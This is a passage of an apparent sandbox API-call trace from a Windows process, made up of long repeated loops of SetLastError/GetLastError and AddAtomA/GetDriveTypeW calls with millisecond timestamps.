0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError 
(dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError 
(dwErrCode=0x0) [0113.131] GetLastError () returned 0x0 [0113.131] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.132] SetLastError (dwErrCode=0x0) [0113.132] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError 
(dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.133] GetLastError () returned 0x0 [0113.133] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.134] GetLastError () returned 0x0 [0113.134] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError 
(dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.135] SetLastError (dwErrCode=0x0) [0113.135] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.136] GetLastError () returned 0x0 [0113.136] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError 
(dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.137] SetLastError (dwErrCode=0x0) [0113.137] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] GetLastError () returned 0x0 [0113.138] SetLastError (dwErrCode=0x0) [0113.138] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0113.138] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) 
returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.139] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.139] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.140] AddAtomA (lpString=0x0) returned 0x0 [0113.140] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.141] AddAtomA (lpString=0x0) returned 0x0 [0113.141] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) 
returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) 
returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW 
